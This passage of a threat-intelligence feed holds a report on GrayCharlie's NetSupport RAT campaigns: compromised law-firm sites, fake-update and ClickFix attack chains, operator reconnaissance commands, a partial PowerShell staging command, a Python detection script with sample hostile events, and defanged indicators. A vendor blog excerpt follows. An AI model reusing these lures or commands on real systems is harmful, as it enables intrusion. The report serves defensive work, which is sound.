            <div><strong>Domain</strong></div>
            <div><strong>Company</strong></div>
            <div><strong>Country</strong></div>
            <div><strong>SMB Team</strong></div>
          </div>
          <div>
            <div>bianchilawgroup[.]com</div>
            <div>Bianchi Law Group</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>brattonlawgroup[.]com</div>
            <div>Bratton Law Group</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>brighterdaylaw[.]com</div>
            <div>Brighter Day Law</div>
            <div>US</div>
            <div>N/A</div>
          </div>
          <div>
            <div>defensegroup[.]com</div>
            <div>The Defense Group</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>dwicriminallawcenter[.]com</div>
            <div>Benjamin Law Firm LLC</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>fisherstonelaw[.]com</div>
            <div>Fisher Stone, P.C.</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>jarrettfirm[.]com</div>
            <div>Jarrett &amp; Price LLC</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>raineyandrainey[.]com</div>
            <div>Rainey &amp; Rainey Attorneys At Law PLLC</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>rbbfirm[.]com</div>
            <div>Buchanan Law Group</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>rmvlawyer[.]com</div>
            <div>The Law Office of Brian Simoneau, P.C.</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>www[.]brentadams[.]com</div>
            <div>Brent Adams &amp; Associates</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>www[.]cfblaw[.]com</div>
            <div>Cohen Forman Barone, PC</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>www[.]gerlinglaw[.]com</div>
            <div>Gerling Law Injury Attorneys</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>www[.]immigration-defense[.]com</div>
            <div>Law Offices of Daniel Shanfield</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>www[.]schwartzandschwartz[.]com</div>
            <div>Schwartz &amp; Schwartz Attorneys at Law, P.A.</div>
            <div>US</div>
            <div>N/A</div>
          </div>
        </div>
        <p><em><strong>Table 6:</strong></em> <em>Compromised law firm websites linked to GrayCharlie (Source: Recorded Future)</em></p>
        <div>
          <div>
            <div>
              <p>
                <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_18fd20865333f5d84a84b457d80ddd430d382877b.png?width=750&amp;format=png&amp;optimize=medium" width="1588" height="830" />
              </p>
              <p>
                <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1ebd43f461510a56badf377e44049eaf90555a74a.png?width=750&amp;format=png&amp;optimize=medium" width="430" height="117" />
              </p>
            </div>
          </div>
          <div>
            <div><em><strong>Figure 4:</strong></em> <em>Website of Gerling Law Injury Attorneys (top) and SMBTeam logo (bottom) (Source:</em> <em><a href="https://urlscan.io/result/019b035c-aed8-73a6-8f38-60388c596fb6">URLScan</a>)</em></div>
          </div>
        </div>
        <p>Notably, while an SMB Team compromise is possible, Insikt Group also assesses that the actors may have exploited a specific version of WordPress or its plugins used by SMB Team, which could explain the simultaneous compromise of all affected websites.</p>
<p>In some instances, the same WordPress sites are compromised by multiple threat actors simultaneously. For example, <em>bianchilawgroup[.]com</em> has also been compromised by TAG-124 (also known as LandUpdate808 or Kongtuke) since at least December 2025, which <a href="https://urlscan.io/result/019b027f-5214-74ff-b1e3-efec9160620d/dom">used</a> the domain <em>vimsltd[.]com</em>.</p>
        <h4>Higher-Tier Analysis</h4>
        <p>GrayCharlie administers its staging infrastructure primarily over SSH, though other ports are used intermittently. The group manages its NetSupport RAT C2 servers over TCP port 443. Overall, Insikt Group assesses that GrayCharlie relies extensively on proxy services to administer its infrastructure. Additionally, based on presumed browsing activity from higher-tier servers, at least some individuals linked to GrayCharlie are assessed to be Russian-speaking.</p>
        <h3>Attack-Chain Analysis</h3>
        <p>GrayCharlie has been observed using two different attack chains to deliver NetSupport RAT. The first chain uses compromised websites to distribute a fake browser update that triggers the retrieval and installation of a script-based payload; the second chain uses compromised WordPress sites and a ClickFix-style lure that copies a command to fetch and install the RAT. Both culminate in NetSupport execution from <code>%AppData%</code>, Registry Run key persistence, and C2 connectivity; the technical details are expanded below.</p>
        <h4>Attack Chain 1: Fake Browser Update Leading to NetSupport RAT</h4>
        <p>According to public reporting, when GrayCharlie first <a href="https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates">became</a> active in mid-2023, it <a href="https://www.threatdown.com/blog/smartapesg-06-11-2024/">relied</a> on fake browser updates to deliver the NetSupport RAT. Although the group later shifted to the ClickFix technique, Insikt Group <a href="https://infosec.exchange/@monitorsg/115363334718836118">observed</a> a return to fake browser updates as early as October 12, 2025. <strong>Figure 5</strong> provides an overview of Attack Chain 1.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1ca8e19bb49da0d1924539da6e91ae9ddaf6d3227.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="475" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 5:</strong></em> <em>Attack Chain 1 (Source: Recorded Future)</em></div>
          </div>
        </div>
        <ol>
          <li><strong>Website compromise and lure delivery</strong>. Threat actors modify legitimate sites to load malicious scripts that render a browser-specific “update” prompt. Selecting the prompt initiates download of a ZIP “update” package containing a primary JavaScript file alongside decoy <code>.dat</code> files.</li>
          <li><strong>User-executed JavaScript loader</strong>. The victim manually runs the <code>.js</code> script. The script mimics a benign browser component to reduce suspicion while silently initiating the next stage of the attack.</li>
          <li><strong>PowerShell staging via WScript</strong>. The JavaScript launches <code>wscript.exe</code>, which spawns <code>powershell.exe</code>. PowerShell reaches out to a remote host to fetch an obfuscated JavaScript containing encoded tasking.</li>
          <li><strong>Secondary payload retrieval</strong>. PowerShell decodes instructions and downloads the actual payload ZIP archive. This archive contains a complete NetSupport RAT client set, including <code>client32.exe</code> and required DLLs.</li>
          <li><strong>File deployment and execution</strong>. The archive is extracted under the user profile (for example, <code>%AppData%\Roaming\...</code>). <code>client32.exe</code> is started in the background to minimize visible indicators to the user.</li>
          <li><strong>Persistence establishment</strong>. A Windows Run registry key is created to automatically launch <code>client32.exe</code> at logon, ensuring the NetSupport RAT remains active after reboots without requiring further user interaction.</li>
          <li><strong>C2 readiness</strong>. With the NetSupport RAT client running on the infected host, the endpoint is prepared to establish command-and-control connectivity with the attacker's infrastructure.</li>
        </ol>
        <h4>Attack Chain 2: WordPress Redirects and ClickFix Leading to NetSupport RAT</h4>
        <p>As early as April 2025, GrayCharlie <a href="https://www.cybereason.com/blog/net-support-rat-wordpress-clickfix">began</a> using ClickFix as a secondary attack chain, consistent with industry reporting that many threat actors have adopted ClickFix techniques due to their effectiveness. <strong>Figure 6</strong> provides an overview of Attack Chain 2.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1ae1c0d8952cb5c0f7b8157e5acfe6511630de60c.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="618" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 6:</strong></em> <em>Attack Chain 2 (Source: Recorded Future)</em></div>
          </div>
        </div>
        <ol>
          <li><strong>Initial delivery and redirection.</strong> Phishing emails, malicious PDFs, or links on gaming sites direct users to compromised WordPress pages that embed attacker JavaScript.</li>
          <li><strong>Background script and profiling.</strong> A background script loads when the site is visited, injects an iframe, and profiles the environment (such as the operating system and browser) to deliver the next stage.</li>
          <li><strong>ClickFix fake CAPTCHA.</strong> The page presents a fake CAPTCHA that quietly copies a malicious command to the user’s clipboard and instructs them to paste it into the Windows Run dialog (Win+R), turning social engineering into user-assisted execution (see <strong>Figure 7</strong>).</li>
        </ol>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1f878a544b5193108d0dd7bc5d1359a3487d5a705.png?width=750&amp;format=png&amp;optimize=medium" width="509" height="392" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 7:</strong></em> <em>Fake Captcha (Source:</em> <em><a href="https://www.elastic.co/security-labs/a-wretch-client">Elastic</a>)</em></div>
          </div>
        </div>
        <ol>
          <li><strong>Command-driven staging.</strong> The pasted command retrieves a batch file that downloads a ZIP containing NetSupport RAT and uses PowerShell to extract it into <code>%AppData%\Roaming\</code> (see <strong>Figure 8</strong>).</li>
        </ol>
        <div>
          <div>
            <div><code>powershell -Win^dow Style Hidden -Command "Add-Type -AssemblyName 'System. IO.Compression FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('!CF0JOAXML!','!WFHEYHKMZ!')"</code></div>
          </div>
        </div>
        <p><em><strong>Figure 8:</strong></em> <em>PowerShell command (Source:</em> <em><a href="https://www.cybereason.com/blog/net-support-rat-wordpress-clickfix">Cybereason</a>)</em></p>
        <ol>
          <li><strong>NetSupport RAT launch and persistence.</strong> The batch file starts <code>client32.exe</code> and sets a Run registry key to automatically relaunch the NetSupport RAT client at startup, establishing persistence on the endpoint.</li>
          <li><strong>Remote access and follow-on actions.</strong> Once connected to C2, operators can interact with the system, perform reconnaissance (for example, domain group membership queries), transfer files, execute additional commands, and potentially move laterally using access acquired from the host.</li>
        </ol>
        <h3>Observed Operator Activity</h3>
<p>In October 2025, Insikt Group detonated a NetSupport RAT sample (SHA256: 31804c48f9294c9fa7c165c89e487bfbebeda6daf3244ad30b93122bf933c79c) with the C2 server <em>5[.]181[.]156[.]234[:]443</em> linked to GrayCharlie within a controlled environment. Approximately three hours later, the threat actor connected using NetSupport RAT, compressed and moved two files, and then executed group and account reconnaissance commands. The same actor returned three days later and repeated the previously observed reconnaissance commands (see <strong>Figure 9</strong>).</p>
        <div>
          <div>
            <div>
              <pre><code>net group /domain "Domain COmputers"
C:\Windows\system32\net1 group /domain "Domain COmputers"
</code></pre>
            </div>
          </div>
        </div>
        <p><em><strong>Figure 9:</strong></em> <em>Reconnaissance commands (Source: Recorded Future)</em></p>
        <p>When both files were compressed into a single ZIP archive and the executable was detonated, the process sideloaded a DLL identified as Sectop RAT (SHA256: 59e7e7698d77531bfbfea4739d29c14e188b5d3109f63881b9bcc87c72e9de78) with the C2 server <em>85[.]158[.]110[.]179[:]15847</em>. The executable (SHA256: 5f1bd92ad6edea67762c7101cb810dc28fd861f7b8c62e6459226b7ea54e1428) was identified as “Merge XML Files”, version 1.2.0.0, developed by Vovsoft, and was signed with a digital certificate that expired on October 31, 2025.</p>
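<p>As an added example (not code from the report), the following Python rules encode the host-level steps shared by Attack Chain 1 and Attack Chain 2 (wscript.exe spawning PowerShell, the ZIP extraction into <code>%AppData%\Roaming</code> from Figure 8, <code>client32.exe</code> running from the user profile, the Run key) together with the domain group enumeration from Figure 9, and run them over constructed Sysmon-style events; paths, user names and event fields are assumed.</p>

```python
import re

# Constructed, Sysmon-style process-creation and registry events modelled on the
# two attack chains and on the reconnaissance in Figure 9. They are sample data
# for this example, not telemetry from the report.
SAMPLE_EVENTS = [
    {"type": "process", "image": "C:\\Windows\\System32\\wscript.exe",
     "parent": "C:\\Windows\\explorer.exe",
     "cmdline": "wscript.exe \"C:\\Users\\alice\\Downloads\\ChromeUpdate\\update.js\""},
    {"type": "process",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent": "C:\\Windows\\System32\\wscript.exe",
     "cmdline": "powershell -Win^dowStyle Hidden -Command \"Add-Type -AssemblyName "
                "'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory("
                "'C:\\Users\\alice\\AppData\\Local\\Temp\\u.zip','C:\\Users\\alice\\AppData\\Roaming\\NetS')\""},
    {"type": "process", "image": "C:\\Users\\alice\\AppData\\Roaming\\NetS\\client32.exe",
     "parent": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "client32.exe"},
    {"type": "registry",
     "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\NetS",
     "data": "C:\\Users\\alice\\AppData\\Roaming\\NetS\\client32.exe"},
    {"type": "process", "image": "C:\\Windows\\System32\\net.exe",
     "parent": "C:\\Users\\alice\\AppData\\Roaming\\NetS\\client32.exe",
     "cmdline": "net group /domain \"Domain COmputers\""},
    {"type": "process", "image": "C:\\Windows\\System32\\net1.exe",
     "parent": "C:\\Windows\\System32\\net.exe",
     "cmdline": "C:\\Windows\\system32\\net1 group /domain \"Domain COmputers\""},
    {"type": "process",  # benign control: PowerShell from the shell, nothing staged
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent": "C:\\Windows\\explorer.exe", "cmdline": "powershell -Command Get-Date"},
]

APPDATA_ROAMING = re.compile(r"\\AppData\\Roaming\\", re.I)
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
DOMAIN_GROUP = re.compile(r"\bgroup\s+/domain\b", re.I)


def normalise_cmdline(cmd):
    """Drop cmd.exe caret escapes (Win^dowStyle -> WindowStyle) and collapse
    whitespace so lightly obfuscated PowerShell invocations still match."""
    return re.sub(r"\s+", " ", cmd.replace("^", "")).strip()


def basename(path):
    """Lower-cased final path component, tolerating quotes and forward slashes."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the list of rule names the event triggers (empty if none)."""
    hits = []
    if event["type"] == "process":
        img = basename(event["image"])
        parent = basename(event.get("parent", ""))
        cmd = normalise_cmdline(event.get("cmdline", ""))
        if img == "powershell.exe" and parent == "wscript.exe":
            hits.append("wscript_spawns_powershell")      # Attack Chain 1, step 3
        if img == "powershell.exe" and "ExtractToDirectory" in cmd and APPDATA_ROAMING.search(cmd):
            hits.append("zip_extract_to_appdata")         # Attack Chain 2, Figure 8
        if img == "client32.exe" and APPDATA_ROAMING.search(event["image"]):
            hits.append("client32_from_appdata")          # both chains
        if (img in ("net.exe", "net1.exe") and DOMAIN_GROUP.search(cmd)
                and parent in ("client32.exe", "net.exe")):
            hits.append("domain_group_recon")             # Figure 9
    elif event["type"] == "registry":
        if RUN_KEY.search(event["key"]) and basename(event["data"]) == "client32.exe":
            hits.append("run_key_client32")               # persistence step
    return hits


def scan(events):
    """Map each triggered rule to the indices of the events that fired it."""
    findings = {}
    for i, event in enumerate(events):
        for rule in evaluate(event):
            findings.setdefault(rule, []).append(i)
    return findings


if __name__ == "__main__":
    for rule, idx in scan(SAMPLE_EVENTS).items():
        print(f"{rule}: events {idx}")
```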
        <h2>Mitigations</h2>
        <ul>
          <li>Leverage the IoCs in <strong>Appendix A</strong> and <strong>Appendix B</strong> to investigate potential past or ongoing infections, both successful and attempted; Recorded Future customers can use the Recorded Future Intelligence Operations Platform to monitor for future IoCs associated with GrayCharlie.</li>
          <li>Monitor for validated infrastructure associated with the malware families discussed in this report, including NetSupport RAT and Stealc, as well as numerous others identified and validated by Insikt Group, and integrate these indicators into relevant detection and monitoring systems.</li>
          <li>Leverage the Sigma, YARA, and Snort rules provided in <strong>Appendices D</strong>, <strong>E</strong>, and <strong>F</strong> in your security information and event management (SIEM) or endpoint detection and response (EDR) tools to detect the presence or execution of NetSupport RAT. Customers can use additional detection rules available in the Recorded Future Intelligence Operations Platform.</li>
          <li>Use Recorded Future Network Intelligence to detect instances of data exfiltration from your corporate infrastructure to known malicious infrastructure.</li>
          <li>Use the Recorded Future Intelligence Operations Platform to monitor GrayCharlie, other threat actors, and the broader cybercriminal ecosystem, ensuring visibility into the latest tactics, techniques, and procedures (TTPs), preferred tools and services (for example, specific threat activity enablers [TAEs] used by threat actors), and emerging developments.</li>
          <li>Use Recorded Future AI’s reporting feature to generate tailored reports on topics that matter to your company. For example, if you want to stay informed about activities related to GrayCharlie, you can receive regular AI-generated updates on this threat actor.</li>
        </ul>
        <h2>Outlook</h2>
        <p>GrayCharlie has been operating for more than two years, and despite shifts in its tactics, such as alternating between fake updates and ClickFix techniques or transitioning from SmartApe to other hosting providers like MivoCloud, the group’s core behaviors have remained consistent. Given its sustained activity, GrayCharlie is highly likely to remain active and continue targeting organizations worldwide, with a current emphasis on US entities, as indicated by Recorded Future Network Intelligence.</p>
        <p>Insikt Group will continue to closely monitor GrayCharlie to detect emerging threats and evaluate the group’s strategic direction within the broader cybercriminal ecosystem.</p>
        <h2>Appendix A: Indicators of Compromise</h2>
        <div>
          <div>
            <div>
              <pre><code>Cluster 1 NetSupport RAT C2 IP Addresses:
5[.]181[.]159[.]60
5[.]252[.]178[.]23
5[.]252[.]178[.]123
94[.]158[.]245[.]13
94[.]158[.]245[.]63
94[.]158[.]245[.]66
94[.]158[.]245[.]81
94[.]158[.]245[.]104
94[.]158[.]245[.]111
94[.]158[.]245[.]115
94[.]158[.]245[.]118
94[.]158[.]245[.]131
94[.]158[.]245[.]135
94[.]158[.]245[.]137
94[.]158[.]245[.]140
94[.]158[.]245[.]174
185[.]163[.]45[.]30
185[.]163[.]45[.]41
185[.]163[.]45[.]61
185[.]163[.]45[.]73
185[.]163[.]45[.]87
185[.]163[.]45[.]97
185[.]163[.]45[.]130
185[.]225[.]17[.]74
194[.]180[.]191[.]17
194[.]180[.]191[.]51
194[.]180[.]191[.]168
194[.]180[.]191[.]171
194[.]180[.]191[.]189

Cluster 2 NetSupport RAT C2 IP Addresses:
5[.]181[.]159[.]9
5[.]181[.]159[.]38
5[.]181[.]159[.]112
5[.]181[.]159[.]139
5[.]181[.]159[.]140
5[.]181[.]159[.]142
5[.]181[.]159[.]143

Other NetSupport RAT C2 Servers:
5[.]181[.]156[.]234
5[.]181[.]156[.]244
5[.]181[.]159[.]29
5[.]181[.]159[.]62
5[.]252[.]177[.]15
5[.]252[.]177[.]120
5[.]252[.]178[.]35
94[.]158[.]245[.]153
94[.]158[.]245[.]170
185[.]163[.]45[.]16
194[.]180[.]191[.]18
194[.]180[.]191[.]121
194[.]180[.]191[.]209

NetSupport RAT Hashes:

“Type 1” Staging Server IP Addresses:
77[.]83[.]199[.]3
77[.]83[.]199[.]15
77[.]83[.]199[.]31
77[.]83[.]199[.]42
77[.]83[.]199[.]73
77[.]83[.]199[.]82
77[.]83[.]199[.]88
77[.]83[.]199[.]90
77[.]83[.]199[.]112
77[.]83[.]199[.]123
77[.]83[.]199[.]132
77[.]83[.]199[.]142
77[.]83[.]199[.]170
79[.]141[.]160[.]24
79[.]141[.]160[.]34
79[.]141[.]161[.]50
79[.]141[.]161[.]171
79[.]141[.]162[.]35
79[.]141[.]162[.]37
79[.]141[.]162[.]50
79[.]141[.]162[.]132
79[.]141[.]162[.]149
79[.]141[.]162[.]169
79[.]141[.]162[.]177
79[.]141[.]162[.]181
79[.]141[.]162[.]187
79[.]141[.]162[.]204
79[.]141[.]162[.]229
79[.]141[.]163[.]138
79[.]141[.]163[.]176
79[.]141[.]172[.]204
79[.]141[.]172[.]223
79[.]141[.]172[.]229
79[.]141[.]172[.]232
79[.]141[.]172[.]240
79[.]141[.]173[.]60
79[.]141[.]173[.]161
79[.]141[.]173[.]168
85[.]158[.]111[.]29
85[.]158[.]111[.]38
85[.]158[.]111[.]53
85[.]158[.]111[.]75
85[.]158[.]111[.]81
85[.]158[.]111[.]126
89[.]46[.]38[.]34
89[.]46[.]38[.]48
89[.]46[.]38[.]88
89[.]169[.]12[.]48
91[.]193[.]19[.]32
91[.]193[.]19[.]64
91[.]193[.]19[.]78
91[.]193[.]19[.]127
91[.]193[.]19[.]163
91[.]193[.]19[.]188
91[.]193[.]19[.]190
98[.]142[.]240[.]165
98[.]142[.]240[.]188
98[.]142[.]240[.]214
98[.]142[.]240[.]221
98[.]142[.]240[.]246
98[.]142[.]251[.]26
98[.]142[.]251[.]32
98[.]142[.]251[.]42
98[.]142[.]251[.]53
185[.]33[.]84[.]131
185[.]33[.]84[.]153
185[.]33[.]84[.]169
185[.]33[.]85[.]20
185[.]33[.]85[.]26
185[.]33[.]85[.]33
185[.]33[.]85[.]38
185[.]33[.]85[.]52
185[.]33[.]86[.]37
193[.]42[.]38[.]11
193[.]42[.]38[.]79
193[.]42[.]38[.]85
193[.]42[.]38[.]86
193[.]111[.]208[.]2
193[.]111[.]208[.]17
193[.]111[.]208[.]19
193[.]111[.]208[.]23
193[.]111[.]208[.]24
193[.]111[.]208[.]46
193[.]111[.]208[.]75
193[.]111[.]208[.]97
193[.]111[.]208[.]100

Additional IP Addresses Likely Linked to “Type 1” Staging Infrastructure:
23[.]140[.]40[.]66
45[.]153[.]191[.]245
46[.]29[.]163[.]28
89[.]169[.]12[.]48
89[.]253[.]222[.]25
89[.]253[.]222[.]156
95[.]182[.]123[.]86
185[.]231[.]245[.]158
217[.]114[.]15[.]253

“Type 2” Staging Server IP Addresses:
45[.]61[.]134[.]76
77[.]83[.]199[.]162
79[.]141[.]162[.]135
79[.]141[.]163[.]169
91[.]193[.]19[.]220
144[.]172[.]115[.]211
172[.]86[.]90[.]84
185[.]33[.]86[.]11
185[.]80[.]53[.]79
194[.]15[.]216[.]118

“Type 2” Staging Server Domains:
filmlerzltyazilimsx[.]shop
foolowme[.]com
joiner[.]best
lowi1[.]com
morniksell[.]com
persistancejs[.]store
pomofight[.]com
port4loms[.]com
signaturepl[.]com
yungask[.]com

Domains Linked to oreshnik[@]mailum[.]com:
108zhao[.]shop
1sou[.]top
6hms[.]top
789pettoys[.]shop
7serv[.]top
99wc[.]top
abocamuseum[.]icu
actionmovies[.]top
alcmz[.]top
alhasba[.]com
amxdh1[.]icu
anoteryo[.]top
arearugs[.]top
as5yo[.]top
ashesplayer[.]top
avodaride[.]top
azyaamode[.]shop
baihao[.]shop
baihuah[.]top
bedoueroom[.]top
bestproductreviews[.]xyz
bestrollerballpen[.]top
blogdojhow[.]com
bnpparibas[.]top
bokra[.]top
bond007[.]xyz
boxworld[.]top
bstionline[.]com
buildingjobs[.]xyz
buscavuelosbaratos[.]top
buyedmeds[.]top
buylisinopril[.]top
celebrex[.]top
chaojiwang[.]top
chenyiwen[.]top
chinapark[.]top
christianlouboutin2017[.]top
cialissale[.]top
cinselurunler[.]xyz
coinseasygenerator[.]top
couterfv[.]top
couturella[.]shop
covaticonstructioncorp[.]shop
cozartan[.]top
cryptohardware[.]shop
dcdh4[.]shop
dealermobil[.]top
depechemode[.]shop
directoryframework[.]top
discountmontblanc[.]top
discoveronline[.]top
doodstream[.]shop
downloadfreak[.]top
erectilehelp[.]top
filmezz[.]top
filmlerzltyazilimsx[.]shop
fjs95[.]shop
fmovies123[.]top
forging[.]top
fragzone[.]top
franquicias[.]top
fuckhdmov[.]top
gededewe[.]shop
getin[.]top
glitterygadgets[.]shop
gmartph[.]shop
gmt-a[.]shop
grandzxc[.]bet
guosong[.]top
haidao10[.]top
headtechnologies[.]xyz
healthcareplans[.]top
heim-k[.]shop
helperection[.]top
hilfe-ed[.]top
hirek[.]top
howtogetaloan[.]top
ida-ci[.]com
islighting[.]top
iwine[.]top
izone[.]digital
jerseysus[.]top
jiezishijie[.]top
jkse[.]shop
jsmakert[.]shop
k2bsc[.]top
kaestner[.]top
kamagrafr[.]icu
kanshuwang[.]top
kazumaka[.]top
kfzversicherungskosten[.]top
khusinhthaidanphuong[.]top
kingdomholding[.]top
krediteonlinevergleichen[.]top
lang3666[.]top
langwonet[.]top
layardrama21[.]top
lebensversicherungvergleich[.]top
levciavia[.]top
linhua97[.]top
linksoflondononsale[.]top
linksoflondonsale[.]top
liruo[.]top
liveskortv[.]shop
loanonline[.]top
loispaigesimenson[.]com
losartan[.]top
lovedou[.]top
lqsword[.]top
lx7v9[.]top
lycosex[.]top
machine-a-plastifier[.]com
manwithedhelp[.]top
marmocer[.]top
mbpen163[.]top
medicamentsbonmarche[.]top
meimei68[.]top
menjimmychooonline[.]top
milebox[.]shop
mindsetgrowth[.]shop
mm37[.]icu
monclerjackets[.]top
moruk[.]xyz
motocyclenews[.]top
moviefone[.]top
moviesone[.]top
movtime76[.]shop
movtime78[.]shop
musicdownloader[.]top
my-privatebanker[.]top
mybeststream[.]xyz
nackt-bilder[.]top
nana44[.]shop
newbalancesport[.]top
palcomp3[.]top
parisforrent[.]top
pasangiklan[.]top
patekphillipwatches[.]top
pielsteel[.]top
pravaix[.]top
rag382[.]top
rasin[.]shop
refanprediction[.]shop
regopramide[.]top
rnsddse[.]top
sales2016[.]top
sdnews[.]top
searchgo[.]shop
searchweb[.]top
semikeren[.]icu
simvascor[.]icu
simvascor[.]top
snapcans[.]top
sneakermall[.]top
soap2dayfree[.]top
socialsignals[.]shop
socksforrocks[.]shop
streaming-films[.]xyz
syavsp5[.]top
tdsc[.]top
techradar[.]top
tiffanyearringforwomen[.]top
todoarmarios[.]top
todocalefactores[.]top
todocarritos[.]top
travelplace[.]top
trendings[.]top
universaltechnology[.]top
uochut[.]shop
via345[.]top
villahome[.]top
viloriterso[.]icu
viptravelcentres[.]com
vog168[.]top
wandan[.]top
wap9[.]top
warpdrive[.]top
watchesbest[.]top
wavob[.]top
wdwnp[.]top
xelesex[.]top
ydh7[.]shop
yntz6[.]shop
yourcialsupply[.]top
youtubevideo[.]top
yxta[.]top
yybvf[.]top
zaheirx[.]shop
zakachka[.]top
zerolendnow[.]top
zt45gg[.]top

Compromised Law Firm Websites:
bianchilawgroup[.]com
brattonlawgroup[.]com
brighterdaylaw[.]com
defensegroup[.]com
dwicriminallawcenter[.]com
fisherstonelaw[.]com
jarrettfirm[.]com
raineyandrainey[.]com
rbbfirm[.]com
rmvlawyer[.]com
www[.]brentadams[.]com
www[.]cfblaw[.]com
www[.]gerlinglaw[.]com
www[.]immigration-defense[.]com
www[.]schwartzandschwartz[.]com

Sectop RAT Hash:
59e7e7698d77531bfbfea4739d29c14e188b5d3109f63881b9bcc87c72e9de78

SecTopRAT C2 IP Address:
85[.]158[.]110[.]179[:]15847

Other Hashes:
5f1bd92ad6edea67762c7101cb810dc28fd861f7b8c62e6459226b7ea54e1428

Email Address Linked to GrayCharlie:
oreshnik[@]mailum[.]com
</code></pre>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_187b8e348054a7063fd37aec148dfc3337efc5d14.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Network Intelligence: Your Questions, Global Answers]]></title>
            <link>https://www.recordedfuture.com/blog/network-intelligence-questions-answered</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/network-intelligence-questions-answered</guid>
            <pubDate>Mon, 16 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn how network intelligence gives security teams control over threat investigation with global visibility—no more drowning in generic, passive threat feeds.]]></description>
            <content:encoded><![CDATA[
        <h2>The Problem with Pre-Packaged Intelligence</h2>
        <p>Security teams are drowning in threat intelligence feeds. Hundreds of vendors promise comprehensive coverage, real-time alerts, and actionable insights. Yet sophisticated adversaries continue to operate undetected, incidents take weeks to scope, and attribution remains elusive.</p>
        <p>The fundamental issue isn't quality but control. Traditional network visibility solutions force passive consumption: their alerts, their priorities, their timeline. This one-size-fits-all approach assumes threats targeting financial services match those facing critical infrastructure, or that yesterday's patterns predict tomorrow's campaigns.</p>
        <p>Network intelligence flips this model. With global visibility spanning billions of connections across 150+ sensors in 35+ countries, you can investigate what matters to your organization using your own selectors, questions, and mission requirements.</p>
        <h2>What Network Intelligence Actually Means</h2>
        <p>Effective network intelligence requires global visibility at scale: distributed sensors across dozens of countries processing billions of packets daily, generating tens of millions of network flow records. But collection methodology matters equally. Metadata-only approaches capture source and destination IPs, ports, protocols, flow counts, and timestamps without payloads or deep packet inspection. This enables operation at internet scale while better maintaining ethical boundaries and data minimization standards.</p>
        <p>At Recorded Future, our network intelligence capabilities provide access to such global network traffic observations for specific IP addresses of interest. Our Insikt Group uses this same infrastructure to research 500+ malware families and threat actors. Government CERTs use these capabilities to analyze adversary infrastructure at national scale.</p>
        <h2>What This Means in Practice</h2>
        <p>Consider what changes when your security operations can query global network intelligence.</p>
        <p><strong>Faster SOC Triage</strong></p>
        <p>Your team flags a suspicious IP at 2 AM. Instead of guessing whether it's noise or the start of something worse, query the network intelligence platform. See its global communication patterns instantly. Understand whether you're looking at commodity scanning or infrastructure that's been quietly staging against targets for weeks. Internet scanner detection capabilities automatically classify the behavior and reveal specific ports targeted, web requests made, and geographic distribution. Triage in minutes, not hours.</p>
        <p><strong>Targeted or Opportunistic? Now You'll Know</strong></p>
        <p>When threats hit your industry, the first question is always: are we specifically in the crosshairs, or is this spray-and-pray? Network intelligence lets you track adversary infrastructure across your sector before it reaches your perimeter. See the pattern. Understand the targeting. Brief leadership with confidence because you're no longer guessing. You're showing them the actual traffic patterns that prove whether your organization is in the crosshairs or caught in the spray.</p>
        <p><strong>Fraud Infrastructure Exposed</strong></p>
        <p>Fraud campaigns depend on infrastructure that moves fast but leaves traces. Your selectors, run against global network intelligence, can reveal the networks behind credential stuffing, account takeover, and payment fraud before the campaign fully scales.</p>
        <p><strong>Attribution That Actually Holds Up</strong></p>
        <p>Mapping adversary infrastructure is hard. Connecting it to broader campaigns and ultimate operators is harder. Network intelligence gives you the longitudinal visibility to trace how infrastructure evolves, clusters, and connects. Administrative traffic analysis reveals patterns operators use to manage C2 infrastructure. When you identify admin flows from a common source connecting to multiple C2 servers, you're mapping the operator's pattern based on observed behavior across hundreds of global vantage points. You're turning indicators into intelligence.</p>
        <h2>Integration Into Security Workflows</h2>
